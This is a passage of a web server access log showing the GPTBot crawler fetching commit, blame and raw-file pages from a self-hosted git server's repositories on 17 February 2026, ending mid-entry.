[Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/PYZ-00.toc" +[17/Feb/2026:15:05:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/PYZ-00.toc" [Client 74.7.227.38] [Length 53113] [Gzip 27.32] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/PYZ-00.toc" +[17/Feb/2026:15:05:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles" [Client 74.7.227.38] [Length 9937] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:05:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 28192] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/TestApp" +[17/Feb/2026:15:05:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 9928] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/TestApp" +[17/Feb/2026:15:05:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/base_library.zip" [Client 74.7.227.38] [Length 1332005] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/base_library.zip" +[17/Feb/2026:15:05:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 20381] [Gzip 16.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:15:05:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 24007] [Gzip 15.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:15:05:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 9930] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:15:05:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 8088] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:15:05:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 9940] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:15:05:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 6151] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:15:05:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/PYZ-00.toc" [Client 74.7.227.38] [Length 9883] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/PYZ-00.toc" +[17/Feb/2026:15:05:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 9929] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeCache.txt" +[17/Feb/2026:15:05:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm%2fdata%2flogs%2fletsencrypt-requests_error.log" [Client 74.7.227.38] [Length 21186] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt-requests_error.log" +[17/Feb/2026:15:05:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb.patch" [Client 74.7.227.38] [Length 396491] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb" +[17/Feb/2026:15:05:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=.Backup%2fhtml%2fcomponents" [Client 74.7.227.38] [Length 60519] [Gzip 8.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components" +[17/Feb/2026:15:05:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 11212] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:15:05:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/status.json?display=rendered" [Client 74.7.227.38] [Length 10890] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/status.json" +[17/Feb/2026:15:05:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/metadata.json?display=source" [Client 74.7.227.38] [Length 11283] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/metadata.json" +[17/Feb/2026:15:05:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/honeywell-logo.svg?display=source" [Client 74.7.227.38] [Length 13903] [Gzip 2.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/honeywell-logo.svg" +[17/Feb/2026:15:05:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old" [Client 74.7.227.38] [Length 10418] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm" +[17/Feb/2026:15:05:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/assetpilot.ico?display=rendered" [Client 74.7.227.38] [Length 10841] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/assetpilot.ico" +[17/Feb/2026:15:05:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest/my_database.db" [Client 74.7.227.38] [Length 14348] [Gzip 27.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest/my_database.db" +[17/Feb/2026:15:05:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/63aec54418d3c1735d68bf046c7a9e78a247798d?files=html%2fassets%2fjs%2fscript.js" [Client 74.7.227.38] [Length 19245] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/js/script.js" +[17/Feb/2026:15:05:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=html%2fassets%2fjs%2fi18n.js" [Client 74.7.227.38] [Length 36952] [Gzip 7.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/js/i18n.js" +[17/Feb/2026:15:05:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/.Backup/html/README.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html" +[17/Feb/2026:15:05:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/.Backup/html/README.md" +[17/Feb/2026:15:05:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/.vscode" [Client 74.7.227.38] [Length 10139] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project" +[17/Feb/2026:15:05:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 9955] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" +[17/Feb/2026:15:05:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 10180] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" +[17/Feb/2026:15:05:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 43] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" +[17/Feb/2026:15:05:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project" [Client 74.7.227.38] [Length 9893] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project" +[17/Feb/2026:15:05:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old" [Client 74.7.227.38] [Length 9960] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old" +[17/Feb/2026:15:05:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47?files=.TemporaryDocument%2fmain.py.good2" [Client 74.7.227.38] [Length 28677] [Gzip 7.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/main.py.good2" +[17/Feb/2026:15:05:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47?files=.TemporaryDocument%2fapp.js.good2" [Client 74.7.227.38] [Length 30841] [Gzip 8.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/app.js.good2" +[17/Feb/2026:15:05:36 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/%7Bservice.image%7D" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c.diff" +[17/Feb/2026:15:05:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/.vscode/settings.json" [Client 74.7.227.38] [Length 9868] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.vscode/settings.json" +[17/Feb/2026:15:05:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=html%2fcomponents%2fFooter.tsx" [Client 74.7.227.38] [Length 26203] [Gzip 5.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Footer.tsx" +[17/Feb/2026:15:05:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/.vscode" [Client 74.7.227.38] [Length 9912] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/.vscode" +[17/Feb/2026:15:05:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=html%2fcomponents%2fAbout.tsx" [Client 74.7.227.38] [Length 25856] [Gzip 4.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/About.tsx" +[17/Feb/2026:15:05:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=html%2fcomponents%2fHeader.tsx" [Client 74.7.227.38] [Length 26852] [Gzip 5.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Header.tsx" +[17/Feb/2026:15:05:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=html%2fcomponents%2fHero.tsx" [Client 74.7.227.38] [Length 25810] [Gzip 4.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Hero.tsx" +[17/Feb/2026:15:05:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/index.html" [Client 74.7.227.38] [Length 21812] [Gzip 6.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html" +[17/Feb/2026:15:05:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 10888] [Gzip 4.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:15:05:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/status.json" [Client 74.7.227.38] [Length 9879] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/status.json" +[17/Feb/2026:15:05:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a?files=.Backup%2fhtml%2fassets%2fimages%2fBatchControl.png" [Client 74.7.227.38] [Length 19812] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/BatchControl.png" +[17/Feb/2026:15:05:42 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/assets/js/script.js" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a.diff" +[17/Feb/2026:15:05:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.gitignore" [Client 74.7.227.38] [Length 11183] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage" +[17/Feb/2026:15:05:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/nginx.conf" [Client 74.7.227.38] [Length 12206] [Gzip 3.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage" +[17/Feb/2026:15:05:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2f.venv%2flib64" [Client 74.7.227.38] [Length 23584] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/lib64" +[17/Feb/2026:15:05:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/controller-next-todo.md" [Client 74.7.227.38] [Length 11757] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project" +[17/Feb/2026:15:05:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a?files=.Backup%2fhtml%2fassets" [Client 